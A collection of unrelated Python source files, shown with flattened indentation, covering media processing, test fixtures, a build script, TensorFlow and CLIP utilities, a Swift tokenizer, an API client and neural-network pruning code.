'use_prehash': ctx.obj.get(USE_PREHASH, False),
'use_draw_frame': ctx.obj.get(USE_DRAW_FRAME, False),
'media_filters': ctx.obj.get(MEDIA_FILTERS, []),
'skip_all_frames': opt_skip_frames
}
# init media file reader
r = dacite.from_dict(data_class=MediaFileReader, data=init_obj)
ctx.obj[READER] = r
ctx.obj[SKIP_MEDIA_FILTERS] = get_ext(opt_input) == 'json'
# error checks
if not r.n_files:
LOG.info('No files to process.')
return
# process media
for m in tqdm(r.iter_files(), total=r.n_files, desc='Files', leave=False):
ctx.obj[SKIP_FILE] = False # reset
m.skip_all_frames = opt_skip_frames
if sigint.interrupted:
m.unload()
return
for ok in tqdm(m.iter_frames(), total=m.n_frames, desc=m.fn, disable=m.n_frames <= 1, leave=False):
ctx.opts[SKIP_FRAME] = opt_skip_frames
if ctx.obj.get(SKIP_FILE, False):
m.skip_file()
# if not m.frame_count > 0:
# continue
# check for ctl-c, exit gracefully
if sigint.interrupted:
m.unload()
return
# init frame-iter presets
sink.send(m)
# print stats
LOG.info(r.stats)
|
import pytest
@pytest.yield_fixture(scope="module")
def test_domain_project(test_admin_client):
domain = test_admin_client.Domain()
domain.slug = "test-project"
domain.name = "Test Domain"
domain.description = "Test" * 10
domain.save()
yield domain
domain.destroy()
@pytest.yield_fixture(scope="module")
def test_domain(test_admin_client):
domain = test_admin_client.Domain()
domain.slug = "test"
domain.name = "Test Domain"
domain.description = "Test" * 10
domain.save()
yield domain
domain.destroy()
@pytest.yield_fixture(scope="module")
def test_project(test_admin_client, test_domain):
project = test_admin_client.Project()
project.slug = "test"
project.name = "Test"
project.description = project.name * 10
project.domain_id = test_domain.id
project.save()
yield project
project.destroy()
|
# BuildFox deploy script
# compiles multiple files into one python script
import re
from pprint import pprint
re_lib_import = re.compile(r"^from (lib_\w+) import \w+((, \w+)+)?$", flags = re.MULTILINE)
re_import = re.compile(r"^import (\w+)$", flags = re.MULTILINE)
# return prepared text of BuildFox module
def file_text(name):
with open(name, "r") as f:
text = f.read()
text = text.replace("#!/usr/bin/env python", "")
text = text.replace("# BuildFox ninja generator", "")
return text
# return license text
def license_text():
text = open("../license", "r").readlines()
text = ["# " + line if len(line) > 1 else "#\n" for line in text] # don't add space in empty lines
text = "".join(text) + "\n"
return text
# replace BuildFox imports
replaced = False
visited_files = set()
def replace_lib_import(matchobj):
global replaced, visited_files
name = matchobj.group(1)
if name not in visited_files:
visited_files.add(name)
replaced = True
return "%s" % file_text("../%s.py" % name)
else:
return ""
# put all BuildFox imports in one file
text = file_text("../buildfox.py")
replaced = True
while replaced:
replaced = False
text = re_lib_import.sub(replace_lib_import, text)
# place system imports on top
system_imports = set()
def replace_import(matchobj):
global system_imports
system_imports.add(matchobj.group(1))
return ""
text = re_import.sub(replace_import, text)
system_imports = sorted(list(system_imports), key = lambda v: len(v))
# beautify whitespace
text = re.sub("\n\n+", "\n\n", text) # strip more then two new lines in a row
text = text.strip() # strip start and end whitespace
text += "\n" # ensure new line in the end
# figure out version
ver_major = re.search("^MAJOR = (\d+)$", text, flags = re.MULTILINE)
ver_minor = re.search("^MINOR = (\d+)$", text, flags = re.MULTILINE)
if ver_major and ver_minor:
ver = "v%d.%d" % (int(ver_major.group(1)), int(ver_minor.group(1)))
else:
ver = "version unknown"
print("BuildFox %s" % ver)
# write compiled version
with open("__init__.py", "w") as f:
f.write("#!/usr/bin/env python\n\n")
f.write("# BuildFox ninja generator, %s\n\n" % ver)
f.write(license_text())
f.write("\n")
for imp in system_imports:
f.write("import %s\n" % imp)
f.write("\n")
f.write(text)
|
import os
class LocustfileStorage:
def upload(self, locustfile: os.PathLike) -> None:
raise NotImplementedError()
def delete(self) -> None:
raise NotImplementedError()
|
"""Tensorflow based linear algebra backend."""
import tensorflow as tf
# "Forward-import" primitives. Due to the way the 'linalg' module is exported
# in TF, this does not work with 'from tensorflow.linalg import ...'.
det = tf.linalg.det
eigh = tf.linalg.eigh
eigvalsh = tf.linalg.eigvalsh
expm = tf.linalg.expm
inv = tf.linalg.inv
sqrtm = tf.linalg.sqrtm
diagonal = tf.linalg.diag_part
def norm(x, dtype=tf.float32, **kwargs):
x = tf.cast(x, dtype)
return tf.linalg.norm(x, **kwargs)
def eig(*args, **kwargs):
raise NotImplementedError
def logm(x):
original_type = x.dtype
x = tf.cast(x, tf.complex64)
tf_logm = tf.linalg.logm(x)
tf_logm = tf.cast(tf_logm, original_type)
return tf_logm
def svd(x):
s, u, v_t = tf.linalg.svd(x, full_matrices=True)
return u, s, tf.transpose(v_t, perm=(0, 2, 1))
def qr(*args, mode='reduced'):
def qr_aux(x, mode):
if mode == 'complete':
aux = tf.linalg.qr(x, full_matrices=True)
else:
aux = tf.linalg.qr(x)
return aux.q, aux.r
result = tf.map_fn(
lambda x: qr_aux(x, mode),
*args,
dtype=(tf.float32, tf.float32))
return result
def powerm(x, power):
return expm(power * logm(x))
|
import org.pydev.dhyaniv.stockAnalyzer.getandAnalyzeStockData as stockAnalyzer
import org.pydev.dhyaniv.constants.constants as constants
import time
import schedule
if __name__ == "__main__":
print("Hello guys!")
#schedule.every(20).seconds.do(stockAnalyzer.getStockData)
#schedule.every(constants.CHECKFREQUENCY).seconds.do(stockAnalyzer.getStockData)
#schedule.every(constants.CHECKFREQUENCY).seconds.do(stockAnalyzer.getStalkedStocksData)
schedule.every(constants.CHECKFREQUENCY).seconds.do(stockAnalyzer.getSellNotificationData)
while True:
# Checks whether a scheduled task
# is pending to run or not
schedule.run_pending()
time.sleep(1)
|
from django.conf.urls import patterns, include, url
from rest_framework import routers
from talos import views
from django.contrib import admin
router = routers.DefaultRouter()
router.register(r'projects', views.ProjectViewSet)
router.register(r'libraries', views.LibraryFileViewSet)
router.register(r'resource_files', views.ResourceFileViewSet)
router.register(r'keywords', views.KeywordViewSet)
router.register(r'testcases', views.TestcaseViewSet)
router.register(r'suitefiles', views.SuiteFileViewSet)
urlpatterns = [
url(r'^api/', include(router.urls)),
url(r'^admin/', include(admin.site.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
]
|
import string
import math
from codestat_tokenizer import Tokenizer
from token_builders import (
InvalidTokenBuilder,
WhitespaceTokenBuilder,
NewlineTokenBuilder,
EscapedStringTokenBuilder,
IntegerTokenBuilder,
IntegerExponentTokenBuilder,
RealTokenBuilder,
RealExponentTokenBuilder,
PrefixedIntegerTokenBuilder,
SuffixedIdentifierTokenBuilder,
CaseInsensitiveListTokenBuilder,
CaseSensitiveListTokenBuilder,
SingleCharacterTokenBuilder,
PrefixedIdentifierTokenBuilder,
TripleQuoteStringTokenBuilder
)
from cx_token_builders import (
SlashSlashCommentTokenBuilder,
SlashStarCommentTokenBuilder
)
from swift_token_builders import (
SwiftArgumentTokenBuilder,
SwiftSymbolTokenBuilder
)
from examiner import Examiner
class SwiftExaminer(Examiner):
@staticmethod
def __escape_z__():
InvalidTokenBuilder.__escape_z__()
WhitespaceTokenBuilder.__escape_z__()
NewlineTokenBuilder.__escape_z__()
EscapedStringTokenBuilder.__escape_z__()
IntegerTokenBuilder.__escape_z__()
IntegerExponentTokenBuilder.__escape_z__()
RealTokenBuilder.__escape_z__()
RealExponentTokenBuilder.__escape_z__()
PrefixedIntegerTokenBuilder.__escape_z__()
SuffixedIdentifierTokenBuilder.__escape_z__()
CaseInsensitiveListTokenBuilder.__escape_z__()
CaseSensitiveListTokenBuilder.__escape_z__()
SingleCharacterTokenBuilder.__escape_z__()
PrefixedIdentifierTokenBuilder.__escape_z__()
TripleQuoteStringTokenBuilder.__escape_z__()
SlashSlashCommentTokenBuilder.__escape_z__()
SlashStarCommentTokenBuilder.__escape_z__()
SwiftArgumentTokenBuilder.__escape_z__()
SwiftSymbolTokenBuilder.__escape_z__()
return 'Escape ?Z'
def __init__(self, code):
super().__init__()
operand_types = []
whitespace_tb = WhitespaceTokenBuilder()
newline_tb = NewlineTokenBuilder()
stmt_separator_tb = SingleCharacterTokenBuilder(';', 'statement separator', False)
integer_tb = IntegerTokenBuilder('_')
integer_exponent_tb = IntegerExponentTokenBuilder('_')
real_tb = RealTokenBuilder(True, True, '_')
real_exponent_tb = RealExponentTokenBuilder(True, True, 'E', '_')
operand_types.append('number')
argument_tb = SwiftArgumentTokenBuilder()
leads = '_'
extras = '_'
suffixes = '?'
identifier_tb = SuffixedIdentifierTokenBuilder(leads, extras, suffixes)
operand_types.append('identifier')
attribute_tb = PrefixedIdentifierTokenBuilder('@', 'attribute', False)
symbol_tb = SwiftSymbolTokenBuilder('.', 'symbol', True)
operand_types.append('symbol')
quotes = ['"', "'", "’"]
string_tb = EscapedStringTokenBuilder(quotes, 10)
triple_quote_comment_tb = TripleQuoteStringTokenBuilder(quotes)
slash_slash_comment_tb = SlashSlashCommentTokenBuilder()
slash_star_comment_tb = SlashStarCommentTokenBuilder()
operand_types.append('string')
known_operators = [
'+', '-', '*', '/', '%',
'==', '!=', '>', '<', '>=', '<=',
'&&', '||', '!', '&', '|', '^',
'~', '<<', '>>', '===',
'=', '+=', '-=', '*=', '/=', '%=', '<<=', '>>=', '&=', '^=', '|=',
'...', '..<', '?', ':',
'.', '++', '--',
'->', '??', '\\.',
'&+', '&-', '&*'
]
known_operator_tb = CaseSensitiveListTokenBuilder(known_operators, 'operator', False)
self.unary_operators = [
'+', '-',
'!', '~', '&',
'++', '--', ':', '?'
]
self.postfix_operators = [
'++', '--', ':', '!', '?'
]
groupers = ['(', ')', ',', '[', ']', '{', '}']
group_starts = ['(', '[', ',', '{']
group_mids = [',']
group_ends = [')', ']', '}']
groupers_tb = CaseInsensitiveListTokenBuilder(groupers, 'group', False)
keywords = [
'associatedtype', 'class', 'deinit', 'enum', 'extension', 'fileprivate',
'func', 'import', 'init', 'inout', 'internal', 'let', 'open', 'operator',
'private', 'protocol', 'public', 'static', 'struct', 'subscript',
'typealias', 'var',
'break', 'case', 'continue', 'default', 'defer', 'do', 'else', 'fallthrough',
'for', 'guard', 'if', 'in', 'repeat', 'return', 'switch', 'where', 'while',
'as', 'Any', 'catch', 'is', 'rethrows', 'super',
'throw', 'throws', 'try', 'try?', 'try!',
'#available', '#colorLiteral', '#column', '#else', '#elseif', '#endif',
'#file', '#fileLiteral', '#function', '#if', '#imageLiteral', '#line',
'#selector', '#sourceLocation',
'associativity', 'convenience', 'dynamic', 'didSet', 'final', 'get',
'infix', 'indirect', 'lazy', 'left', 'mutating', 'none', 'nonmutating',
'optional', 'override', 'postfix', 'precedence', 'prefix', 'Protocol',
'required', 'right', 'set', 'Type', 'unowned', 'weak', 'willSet'
]
keyword_tb = CaseSensitiveListTokenBuilder(keywords, 'keyword', False)
types = [
'char', 'double', 'float', 'int',
'long', 'short',
]
types_tb = CaseSensitiveListTokenBuilder(types, 'type', True)
operand_types.append('type')
values = [
'nil', 'Self', 'false', 'true'
]
values_tb = CaseSensitiveListTokenBuilder(values, 'value', True)
operand_types.append('value')
invalid_token_builder = InvalidTokenBuilder()
tokenbuilders = [
newline_tb,
whitespace_tb,
stmt_separator_tb,
integer_tb,
integer_exponent_tb,
real_tb,
real_exponent_tb,
argument_tb,
keyword_tb,
types_tb,
values_tb,
known_operator_tb,
groupers_tb,
identifier_tb,
attribute_tb,
symbol_tb,
string_tb,
slash_slash_comment_tb,
slash_star_comment_tb,
triple_quote_comment_tb,
self.unknown_operator_tb,
invalid_token_builder
]
tokenizer = Tokenizer(tokenbuilders)
tokens = tokenizer.tokenize(code)
tokens = Examiner.combine_adjacent_identical_tokens(tokens, 'invalid operator')
self.tokens = Examiner.combine_adjacent_identical_tokens(tokens, 'invalid')
self.convert_keywords_to_identifiers(['.'])
self.calc_statistics()
tokens = self.source_tokens()
tokens = Examiner.join_all_lines(tokens)
self.calc_token_confidence()
self.calc_token_2_confidence()
num_operators = self.count_my_tokens(['operator', 'invalid operator'])
if num_operators > 0:
self.calc_operator_confidence(num_operators)
allow_pairs = []
self.calc_operator_2_confidence(tokens, num_operators, allow_pairs)
self.calc_operator_3_confidence(tokens, num_operators, group_ends, allow_pairs)
self.calc_operator_4_confidence(tokens, num_operators, group_starts, allow_pairs)
self.calc_group_confidence(tokens, group_mids)
operand_types = ['number', 'string', 'symbol']
self.calc_operand_n_confidence(tokens, operand_types, 2)
self.calc_operand_n_confidence(tokens, operand_types, 4)
self.calc_keyword_confidence()
self.calc_line_length_confidence(code, self.max_expected_line)
|
import os
import clip
import torch
import numpy as np
from sklearn.linear_model import LogisticRegression
from torch.utils.data import DataLoader
from torchvision.datasets import CIFAR100
from tqdm import tqdm
# Load the model
device = "cuda" if torch.cuda.is_available() else "cpu"
model, preprocess = clip.load('ViT-B/32', device)
# Load the dataset
root = os.path.expanduser("~/.cache")
train = CIFAR100(root, download=True, train=True, transform=preprocess)
test = CIFAR100(root, download=True, train=False, transform=preprocess)
def get_features(dataset):
all_features = []
all_labels = []
with torch.no_grad():
for images, labels in tqdm(DataLoader(dataset, batch_size=100)):
features = model.encode_image(images.to(device))
all_features.append(features)
all_labels.append(labels)
return torch.cat(all_features).cpu().numpy(), torch.cat(all_labels).cpu().numpy()
# Calculate the image features
train_features, train_labels = get_features(train)
test_features, test_labels = get_features(test)
# Perform logistic regression
classifier = LogisticRegression(random_state=0, C=0.316, max_iter=1000, verbose=1)
classifier.fit(train_features, train_labels)
# Evaluate using the logistic regression classifier
predictions = classifier.predict(test_features)
accuracy = np.mean((test_labels == predictions).astype(np.float)) * 100.
print(f"Accuracy = {accuracy:.3f}")
|
# mAP and topk recall rate for image retrieval
import numpy as np
import torch
from torch.autograd import Variable
import pdb
def main():
x_query = Variable(torch.rand(3,100))
x_gallery = Variable(torch.rand(9,100))
y_query = Variable(torch.LongTensor([0,1,2]))
y_gallery = Variable(torch.LongTensor([0,0,1,1,1,1,2,2,2]))
test=ImageRetrieval()
result1=test(x_query,x_gallery,y_query,y_gallery)
result2=test.getby_numpy(x_query.data.numpy(),x_gallery.data.numpy(),
y_query.data.numpy(),y_gallery.data.numpy())
print('p={},r={}'.format(result1[0],result1[1]))
print('p={},r={}'.format(result2[0],result2[1]))
class ImageRetrieval:
def __init__(self, topk=10, cuda=False):
self.topk = topk
self.cuda = cuda
def normalize(self, x, tool, axis=None, epsilon=10e-12):
''' Devide the vectors in x by their norms.'''
if axis is None:
axis = len(x.shape) - 1
if tool == 'numpy':
norm = np.linalg.norm(x, axis=axis, keepdims=True)
elif tool == 'torch':
norm = torch.mul(x,x).sum(dim=axis, keepdim=True).sqrt()
x = x / (norm + epsilon)
return x
def __call__(self, x_query, x_gallery, y_query, y_gallery):
x_query = self.normalize(x_query, 'torch')
x_gallery = self.normalize(x_gallery, 'torch')
score_mat = torch.mm(x_query, x_gallery.transpose(1,0))
temp1 = torch.eye(x_query.size(0))
temp2 = torch.ones(x_query.size(0))
score_mask = temp2 - temp1
if self.cuda:
score_mask = score_mask.cuda()
if x_query.size(0) == x_gallery.size(0):
score_mat = torch.mul(score_mask, score_mat)
# compute label matrix
y_query = y_query[:,None]
y_gallery = y_gallery[:,None]
label_mat = y_query==y_gallery.transpose(1,0)
label_mat=label_mat.type(torch.FloatTensor)
# sort scores and labels
_,idx_sorted = torch.sort(-score_mat, dim=1)
tmp_list = [(label_mat[x, idx_sorted[x]])[None,:] for x in range(label_mat.shape[0])]
label_sorted = torch.zeros(label_mat.size())
torch.cat(tmp_list, out=label_sorted)
if self.cuda:
label_sorted = label_sorted.cuda()
if x_query.size(0) == x_gallery.size(0):
label_sorted = torch.mul(score_mask, label_sorted)
label_sorted = Variable(label_sorted, requires_grad=False)
# check the number of matching images
num_positive = torch.sum(label_sorted, dim=1)
idx = num_positive.nonzero()
# compute precision of top positives
if idx.numel() != 0:
precision = torch.zeros(idx.size(0))
precision = Variable(precision, requires_grad=False)
if self.cuda:
precision = precision.cuda()
for i,j in enumerate(idx):
num = float(num_positive[j])
temp = label_sorted[j].nonzero()
den = float(temp[-1][-1])
if den+1 == 0:
pdb.set_trace()
precision[i] = num/(den+1)
precision = torch.mean(precision).item()
else:
precision = 0.0
# compute top k recall
if idx.numel() != 0:
if label_sorted.size(-1) < self.topk:
topk = label_sorted.size(-1)
else:
topk = self.topk
total = torch.sum(label_sorted[idx,:topk].view(-1,topk), dim=1)
num = float(total.nonzero().size(0))
den = float(idx.size(0))
recall = num/den
else:
recall = 0.0
return precision,recall
def getby_numpy(self, x_query, x_gallery, y_query, y_gallery):
x_query = self.normalize(x_query,'numpy')
x_gallery = self.normalize(x_gallery,'numpy')
score_mat = np.dot(x_query,x_gallery.T)
# compute label matrix
y_query = y_query[:,None]
y_gallery = y_gallery[:,None]
label_mat = y_query==y_gallery.T
idx_sorted = np.argsort(-score_mat, axis=1)
label_sorted = [label_mat[x, idx_sorted[x]] for x in range(label_mat.shape[0])]
label_sorted = np.array(label_sorted)
label_sorted = label_sorted.astype(float)
# check the number of matching images
num_positive = np.sum(label_sorted, axis=1)
idx = num_positive.nonzero()
# compute precision of top positives
if len(idx[0]) != 0:
precision = np.zeros((len(idx[0])))
for i,j in enumerate(idx[0]):
num = float(num_positive[j])
temp = label_sorted[j].nonzero()
den = float(temp[0][-1])
precision[i] = num/(den+1)
precision = float(np.mean(precision))
else:
precision = 0.0
# compute top k recall
if len(idx[0]) != 0:
total = np.sum(label_sorted[idx,:self.topk].reshape(-1,self.topk), axis=1)
num = float(len(total.nonzero()[0]))
den = float(len(idx[0]))
recall = num/den
else:
recall = 0.0
return precision,recall
|
r"""Collection of quadrature methods."""
import logging
from functools import wraps
from .frontend import generate_quadrature
from .sparse_grid import sparse_grid
from .utils import combine
from .chebyshev import chebyshev_1, chebyshev_2
from .clenshaw_curtis import clenshaw_curtis
from .discrete import discrete
from .fejer_1 import fejer_1
from .fejer_2 import fejer_2
from .gaussian import gaussian
from .genz_keister import (
genz_keister_16, genz_keister_18, genz_keister_22, genz_keister_24)
from .gegenbauer import gegenbauer
from .grid import grid
from .hermite import hermite
from .jacobi import jacobi
from .kronrod import kronrod, kronrod_jacobi
from .laguerre import laguerre
from .legendre import legendre, legendre_proxy
from .leja import leja
from .lobatto import lobatto
from .newton_cotes import newton_cotes
from .patterson import patterson
from .radau import radau
__all__ = ["generate_quadrature", "sparse_grid", "combine"]
INTEGRATION_COLLECTION = {
"clenshaw_curtis": clenshaw_curtis,
"discrete": discrete,
"fejer_1": fejer_1,
"fejer_2": fejer_2,
"gaussian": gaussian,
"genz_keister_16": genz_keister_16,
"genz_keister_18": genz_keister_18,
"genz_keister_22": genz_keister_22,
"genz_keister_24": genz_keister_24,
"grid": grid,
"kronrod": kronrod,
"legendre": legendre_proxy,
"leja": leja,
"lobatto": lobatto,
"newton_cotes": newton_cotes,
"patterson": patterson,
"radau": radau,
}
def quadrature_deprecation_warning(name, func):
"""Announce deprecation warning for quad-func."""
quad_name = "quad_%s" % name
@wraps(func)
def wrapped(*args, **kwargs):
"""Function wrapper adds warnings."""
logger = logging.getLogger(__name__)
logger.warning("chaospy.%s name is to be deprecated; "
"Use chaospy.quadrature.%s instead",
quad_name, func.__name__)
return func(*args, **kwargs)
globals()[quad_name] = wrapped
__all__.append(quad_name)
quadrature_deprecation_warning("clenshaw_curtis", clenshaw_curtis)
quadrature_deprecation_warning("discrete", discrete)
quadrature_deprecation_warning("fejer", fejer_2)
quadrature_deprecation_warning("grid", grid)
quadrature_deprecation_warning("gaussian", gaussian)
quadrature_deprecation_warning("newton_cotes", newton_cotes)
quadrature_deprecation_warning("leja", leja)
quadrature_deprecation_warning("gauss_legendre", legendre_proxy)
quadrature_deprecation_warning("gauss_kronrod", kronrod)
quadrature_deprecation_warning("gauss_lobatto", lobatto)
quadrature_deprecation_warning("gauss_patterson", patterson)
quadrature_deprecation_warning("gauss_radau", radau)
quadrature_deprecation_warning("genz_keister", genz_keister_24)
|
from abc import ABC, abstractmethod
from datetime import date
from listens.definitions import SunlightWindow
class SunlightGateway(ABC):
@abstractmethod
def fetch_sunlight_window(self, iana_timezone: str, on_date: date) -> SunlightWindow:
...
|
# -*- coding: utf-8 -*-
"""
datagator.api.client._entity
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: 2015 by `University of Denver <http://pardee.du.edu/>`_
:license: Apache 2.0, see LICENSE for more details.
:author: `LIU Yu <liuyu@opencps.net>`_
:date: 2015/03/24
"""
from __future__ import unicode_literals, with_statement
import abc
import atexit
import importlib
import io
import itertools
import json
import jsonschema
import logging
import os
import re
import tempfile
from . import environ
from ._backend import DataGatorService
from ._cache import CacheManager
from ._compat import OrderedDict, with_metaclass
from ._compat import to_bytes, to_native, to_unicode
__all__ = ['Entity', 'validated', 'normalized', ]
__all__ = [to_native(n) for n in __all__]
_log = logging.getLogger(__name__)
def normalized(kind):
"""
Normalized entity kind without leading "datagator#"
"""
kind = to_unicode(kind or "")
if kind.startswith("datagator#"):
kind = kind[len("datagator#"):]
return kind or None
class validated(object):
"""
Context manager and proxy to validated response from backend service
"""
DEFAULT_CHUNK_SIZE = 2 ** 21 # 2MB
__slots__ = ['__response', '__expected_status', '__raw_body',
'__decoded_body', '__size', ]
def __init__(self, response, verify_status=True):
"""
:param response: response object from the backend service
:param exptected: `list` or `tuple` of expected status codes
"""
assert(environ.DATAGATOR_API_VERSION == "v2"), \
"incompatible backend service version"
self.__response = response
self.__expected_status = tuple(verify_status) \
if isinstance(verify_status, (list, tuple)) else (200, ) \
if verify_status else None
self.__raw_body = None
self.__decoded_body = None
self.__size = 0
pass
@property
def status_code(self):
"""
HTTP status code of the underlying response
"""
return self.__response.status_code
@property
def headers(self):
"""
HTTP message headers of the underlying response
"""
return self.__response.headers
@property
def links(self):
"""
HTTP Link headers parsed as a dictionary
"""
if "Link" not in self.headers:
return dict()
regex = r"""<([^\>]*)>;\s*rel="(\w+)"\s*"""
return dict([(k, v) for v, k in re.findall(
regex, self.headers['Link'])])
@property
def body(self):
"""
HTTP message body stored as a file-like object
"""
if self.__raw_body is not None:
self.__raw_body.seek(0)
return self.__raw_body
def json(self, validate_schema=True):
"""
JSON-decoded message body of the underlying response
"""
if self.__decoded_body is None:
try:
# py3k cannot `json.load()` binary files directly, it needs a
# text IO wrapper to handle decoding (to unicode / str)
data = json.load(io.TextIOWrapper(self.body))
if validate_schema:
Entity.schema.validate(data)
except (jsonschema.ValidationError, AssertionError, IOError, ):
raise RuntimeError("invalid response from backend service")
else:
self.__decoded_body = data
return self.__decoded_body
def __len__(self):
return self.__size
def __enter__(self):
# validate content-type and body data
_log.debug("validating response")
_log.debug(" - from: {0}".format(self.__response.url))
_log.debug(" - status code: {0}".format(self.__response.status_code))
_log.debug(" - response time: {0}".format(self.__response.elapsed))
try:
# response body should be a valid JSON object
assert(self.headers['Content-Type'] == "application/json")
f = tempfile.SpooledTemporaryFile(
max_size=self.DEFAULT_CHUNK_SIZE, mode="w+b",
suffix=".DataGatorEntity")
# make sure f conforms to the prototype of `io.IOBase`
for attr in ("readable", "writable", "seekable"):
if not hasattr(f, attr):
setattr(f, attr, lambda: True)
# wrie decoded response body
for chunk in self.__response.iter_content(
chunk_size=self.DEFAULT_CHUNK_SIZE,
decode_unicode=True):
if not chunk:
continue
f.write(chunk)
self.__raw_body = f
self.__size = f.tell()
_log.debug(" - decoded size: {0}".format(len(self)))
except (AssertionError, IOError, ):
# re-raise as runtime error
raise RuntimeError("invalid response from backend service")
else:
# validate status code
if self.__expected_status is not None and \
self.status_code not in self.__expected_status:
# error responses always come with code and message
data = self.json()
msg = "unexpected response from backend service"
if data.get("kind") == "datagator#Error":
msg = "{0} ({1}): {2}".format(
msg, data.get("code", "N/A"), data.get("message", ""))
# re-raise as runtime error
raise RuntimeError(msg)
pass
return self
def __exit__(self, ext_type, exc_value, traceback):
if isinstance(exc_value, Exception):
_log.error("failed response validation")
# discard temporary file
if self.__raw_body is not None:
self.__raw_body.close()
self.__raw_body = None
return False # re-raise exception
pass
class EntityType(type):
"""
Meta class for initializing class members of the Entity class
"""
def __new__(cls, name, parent, prop):
# initialize cache manager shared by all entities
try:
mod, sep, cm_cls = environ.DATAGATOR_CACHE_BACKEND.rpartition(".")
CacheManagerBackend = getattr(importlib.import_module(mod), cm_cls)
assert(issubclass(CacheManagerBackend, CacheManager))
except (ImportError, AssertionError):
raise AssertionError("invalid cache backend '{0}'".format(
environ.DATAGATOR_CACHE_BACKEND))
else:
prop['store'] = CacheManagerBackend()
# initialize backend service shared by all entities
try:
service = DataGatorService()
except:
raise RuntimeError("failed to initialize backend service")
else:
prop['service'] = service
# initialize schema validator shared by all entities
try:
# load schema from local file if exists (fast but may be staled)
filename = os.path.join(os.path.dirname(__file__), "schema.json")
schema = None
if os.access(filename, os.F_OK | os.R_OK):
with open(filename, "r") as f:
schema = json.load(f)
f.close()
# load schema from service backend (slow but always up-to-date)
if schema is None:
schema = prop['service'].schema
except:
raise RuntimeError("failed to initialize schema validator")
else:
JsonSchemaValidator = jsonschema.validators.create(
meta_schema=jsonschema.Draft4Validator.META_SCHEMA,
validators=jsonschema.Draft4Validator.VALIDATORS,
version=b"draft4",
default_types=dict(itertools.chain(
jsonschema.Draft4Validator.DEFAULT_TYPES.items(),
[('array', (list, tuple)), ]))
)
prop['schema'] = JsonSchemaValidator(schema)
return type(to_native(name), parent, prop)
pass
class Entity(with_metaclass(EntityType, object)):
"""
Abstract base class of all client-side entities
"""
class Ref(OrderedDict):
def __hash__(self):
return json.dumps(self).__hash__()
pass
@classmethod
def cleanup(cls):
# decref triggers garbage collection of the cache manager backend
setattr(cls, "store", None)
pass
__slots__ = ['__kind', ]
def __init__(self, kind):
super(Entity, self).__init__()
self.__kind = normalized(kind)
pass
@property
def kind(self):
return self.__kind
@property
@abc.abstractmethod
def uri(self):
return None
@property
@abc.abstractmethod
def ref(self):
return None
# `cache` is defined with old-school getter / deleter methods, because a
# subclass may need to access `super(SubClass, self)._cache_getter()` and
# `._cache_deleter()` to extend / override the default caching behaviour.
def _cache_getter(self):
data = Entity.store.get(self.uri, None)
if data is None:
with validated(Entity.service.get(self.uri, stream=True)) as r:
# valid response should bear a matching entity kind
kind = normalized(r.headers.get("X-DataGator-Entity", None))
assert(kind == self.kind), \
"unexpected entity kind '{0}'".format(kind)
# cache data for reuse (iff. advised by the backend)
if r.headers.get("Cache-Control", "private") != "no-cache":
# cache backend typically only support byte-string values,
# so passing `r.body` (file-like object) instead of `data`
# (dictionary) can save an extra round of JSON-encoding.
Entity.store.put(self.uri, r.body)
# this should come last since calling `r.json()` will close the
# temporary file under `r.body` implicitly (observed in py27).
data = r.json()
return data
def _cache_deleter(self):
Entity.store.delete(self.uri)
pass
cache = property(_cache_getter, None, _cache_deleter)
def _to_json(self):
return self.cache
def __repr__(self):
return "<{0} '{1}' at 0x{2:x}>".format(
self.__class__.__name__, self.uri, id(self))
pass
atexit.register(Entity.cleanup)
|
import torch
from torch import autograd, nn
import torch.nn.functional as F
from itertools import repeat
from torch._six import container_abcs
import time
from prune.pruning_method_transposable_block_l1 import PruningMethodTransposableBlockL1
def _ntuple(n):
def parse(x):
if isinstance(x, container_abcs.Iterable):
return x
return tuple(repeat(x, n))
return parse
_single = _ntuple(1)
_pair = _ntuple(2)
_triple = _ntuple(3)
_quadruple = _ntuple(4)
def update_mask_approx2(data, mask, topk=4,BS=8):
mask.fill_(0)
Co = data.shape[0]
#topk=BS//2
_,idx_sort = data.sort(1,descending=True); #block x 64
for k in range(BS**2):
if k<topk:
mask[range(Co),idx_sort[range(Co),k]] = 1
else:
ii,jj = idx_sort//BS,idx_sort%BS
row_cond= mask.view(-1,BS,BS).sum(1)[range(Co),jj[:,k]]<topk
col_cond = mask.view(-1,BS,BS).sum(2)[range(Co),ii[:,k]]<topk
if (~row_cond).all() and (~col_cond).all():
break
idx_sort[row_cond.mul(col_cond)][:,k]
mask[row_cond.mul(col_cond),idx_sort[row_cond.mul(col_cond)][:,k]]=1
return mask
def update_mask(data, mask, BS=8, top_k_eval=32, max_steps=1):
Co = data.shape[0]
for k in range(max_steps):
val_max, ind_max = data.mul(1 - mask).topk(top_k_eval, 1, sorted=False)
iii, jjj = ind_max // BS, ind_max % BS
copy_data = data.clone()
copy_data[mask == 0] = 1e9
mpc = copy_data.reshape(-1, BS, BS).min(1)[1]
mpr = copy_data.reshape(-1, BS, BS).min(2)[1]
out_r = mpr.gather(1, iii)
out_c = mpc.gather(1, jjj)
ind_out = torch.cat([iii * BS + out_r, out_c * BS + jjj]).reshape(2, Co, top_k_eval)
ind_in_new = out_c * BS + out_r
ind_in = torch.cat([ind_max, ind_in_new]).reshape(2, Co, top_k_eval)
val_in = data.mul(1 - mask).gather(1, ind_in[1])
val_min1 = data.gather(1, ind_out[0])
val_min2 = data.gather(1, ind_out[1])
mask_change_val, mask_change_ind = (val_max + val_in - val_min1 - val_min2).max(1)
ind_in = ind_in[:, range(Co), mask_change_ind].t()
ind_out = ind_out[:, range(Co), mask_change_ind].t()
block_masks_in = torch.zeros_like(data).reshape(Co, -1).scatter_(1, ind_in, torch.ones_like(ind_in).float())
block_masks_out = torch.zeros_like(data).reshape(Co, -1).scatter_(1, ind_out, torch.ones_like(ind_out).float())
new_mask = (mask + block_masks_in - block_masks_out).clamp(0, 1)
mask_update = mask_change_val > 0
mask[mask_update] = new_mask[mask_update]
if sum(mask_update) == 0:
break
return mask
class SparseTranspose(autograd.Function):
"""" Prune the unimprotant edges for the forwards phase but pass the gradient to dense weight using STE in the backwards phase"""
@staticmethod
def forward(ctx, weight, N, M, counter, freq, absorb_mean):
weight.mask = weight.mask.to(weight)
output = weight.clone()
if counter%freq==0:
weight_temp = weight.detach().abs().reshape(-1, M*M)
weight_mask = weight.mask.detach().reshape(-1, M*M)
#weight_mask = update_mask(weight_temp,weight_mask,BS=M)
